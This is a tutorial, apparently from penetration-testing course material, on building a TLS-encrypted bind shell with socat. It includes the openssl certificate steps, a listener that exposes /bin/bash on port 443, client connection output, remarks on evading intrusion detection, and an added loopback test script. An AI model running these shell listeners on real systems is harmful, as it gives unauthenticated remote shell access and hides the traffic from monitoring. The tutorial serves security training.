Socat Encrypted Bind Shells

Socat

Socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. Each end can be a file, pipe, device, TCP/UDP/UNIX socket, TLS connection, or the stdio of a program, which is what makes it useful for bind and reverse shells.

Socat Encrypted Bind Shells

To encrypt the bind shell we wrap it in TLS using an X.509 certificate. Because the shell traffic is then encrypted, a network intrusion detection system that relies on inspecting payload content (shell prompts, command output, the payload itself) cannot see what is being transmitted. The connection itself, a TLS session to a self-signed certificate on a chosen port, remains visible.

Let's take the example of sam wanting to connect to dan over an encrypted channel. First we use OpenSSL to create a self-signed certificate, with the following options:

req: start a new certificate signing request (turned into a self-signed certificate by -x509 below)
-newkey: generate a new private key
rsa:2048: use RSA with a 2,048-bit key length
-nodes: store the private key without passphrase protection, so socat can load it non-interactively
-keyout: save the key to a file
-x509: output a self-signed certificate instead of a certificate request
-days: set the validity period in days
-out: save the certificate to a file
kali@kali:~$ openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
Generating a 2048 bit RSA private key
.......................+++
writing new private key to 'bind_shell.key'
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:Georgia
Locality Name (eg, city) []:Atlanta
Organization Name (eg, company) [Internet Widgits Pty Ltd]:D2k
Organizational Unit Name (eg, section) []:Security Department
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:


After the key and certificate have been generated, we need to put them into the format socat expects: a single PEM file containing both the private key and the certificate. We combine bind_shell.key and bind_shell.crt into bind_shell.pem:

kali@kali:~$ cat bind_shell.key bind_shell.crt > bind_shell.pem

The .pem file now contains the private key, so keep it readable only by the user running the listener (chmod 600 bind_shell.pem).

Now we need a listener on dan's machine for the incoming connection. Port 443 is a privileged port, so the listener is started with sudo:

kali@dan:~$ sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash


Breaking down the command:

OPENSSL-LISTEN:443: create a TLS listener on port 443
cert=bind_shell.pem: the combined key and certificate file presented to clients
verify=0: do not require or verify a client certificate
fork: spawn a child process for each incoming connection, so the listener keeps accepting
EXEC:/bin/bash: connect the stream to a bash process

Let's connect to dan's computer from sam's machine over the bind shell:

c:\Users\sam> socat - OPENSSL:10.1.1.10:443,verify=0
id
uid=1000(kali) gid=1000(kali) groups=1000(kali)
whoami
kali

Breaking down the command:

-: transfer data between the connection and STDIO (the local terminal)
OPENSSL:10.1.1.10:443: establish a TLS connection to the remote listener
verify=0: do not verify the listener's certificate

Our encrypted bind shell is working. Note what verify=0 on both sides implies: the listener does not authenticate the client, so anyone who can reach the port gets a shell, and the client does not authenticate the listener, so it cannot tell the real listener from an interceptor. If sam already holds a copy of bind_shell.crt, passing it to the client with cafile= (and leaving verification on) closes the second gap.
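The whole procedure above (self-signed certificate, combined PEM, OPENSSL-LISTEN bind shell, OPENSSL client) run end to end on a single host over loopback, plus a client that keeps certificate verification on. This is an added example, not code from the original post. It assumes openssl and socat are installed, that port 4443 is free, and that a temp directory can be written; the listener uses /bin/sh instead of the post's /bin/bash so it runs on minimal systems, the -subj value replaces the interactive prompts, and the CN "dan" is an assumption.

```shell
#!/bin/sh
# Added example, not code from the original post. Assumed: openssl and socat
# installed, port 4443 free, temp dir writable. CN "dan" is an assumption.
set -eu

WORKDIR="${WORKDIR:-$(mktemp -d)}"
PORT="${PORT:-4443}"

# Steps 1 and 2: self-signed certificate (non-interactive via -subj instead of
# the prompts shown in the post) and the key+cert PEM that socat's cert= reads.
make_pem() {
  name="$1"
  openssl req -newkey rsa:2048 -nodes -keyout "$WORKDIR/$name.key" \
    -x509 -days 362 -subj "/CN=$name" -out "$WORKDIR/$name.crt" 2>/dev/null
  cat "$WORKDIR/$name.key" "$WORKDIR/$name.crt" > "$WORKDIR/$name.pem"
  chmod 600 "$WORKDIR/$name.pem"   # the PEM holds the private key
  printf '%s\n' "$WORKDIR/$name.pem"
}

# Check that the PEM carries both a private key and a certificate, and that
# the certificate parses (prints its SHA-256 fingerprint on success).
pem_is_complete() {
  pem="$1"
  grep -q 'BEGIN .*PRIVATE KEY' "$pem" && grep -q 'BEGIN CERTIFICATE' "$pem" \
    && openssl x509 -in "$pem" -noout -fingerprint -sha256
}

# Step 3: the listener from the post. verify=0 means no client certificate is
# required; fork serves each connection in its own child. Output is redirected
# so the PID can be captured with $(...) without blocking on the pipe.
start_listener() {
  pem="$1"
  socat OPENSSL-LISTEN:"$PORT",cert="$pem",verify=0,fork,reuseaddr EXEC:/bin/sh \
    </dev/null >"$WORKDIR/listener.log" 2>&1 &
  echo $!
}

# Poll until the listener completes a TLS handshake (at most ~10 s).
wait_for_listener() {
  i=0
  while [ "$i" -lt 10 ]; do
    if printf '' | socat -t 5 - OPENSSL:127.0.0.1:"$PORT",verify=0 >/dev/null 2>&1; then
      return 0
    fi
    i=$((i + 1))
    sleep 1
  done
  return 1
}

# Step 4: the client from the post, with the command fed on stdin instead of
# a terminal so the result can be captured. verify=0 skips certificate checks,
# so this client would talk just as happily to an impostor listener.
# -t 5 gives the remote shell up to 5 s to answer after stdin reaches EOF.
run_remote() {
  printf '%s\n' "$1" | socat -t 5 - OPENSSL:127.0.0.1:"$PORT",verify=0
}

# Same client with verification kept on: the listener's own certificate is
# the trust anchor (cafile=) and its CN must match (commonname=), so a
# listener presenting any other certificate is rejected at the handshake.
run_remote_pinned() {
  printf '%s\n' "$1" | socat -t 5 - \
    OPENSSL:127.0.0.1:"$PORT",cafile="$2",commonname="$3",verify=1
}
```

Usage: `pem=$(make_pem dan); pid=$(start_listener "$pem"); wait_for_listener; run_remote 'id'; run_remote_pinned 'id' "$WORKDIR/dan.crt" dan; kill "$pid"`. Running `run_remote_pinned` against a listener that presents a different certificate (for example one made with `make_pem mallory`) fails at the handshake instead of handing over a shell, which is the property verify=0 gives up.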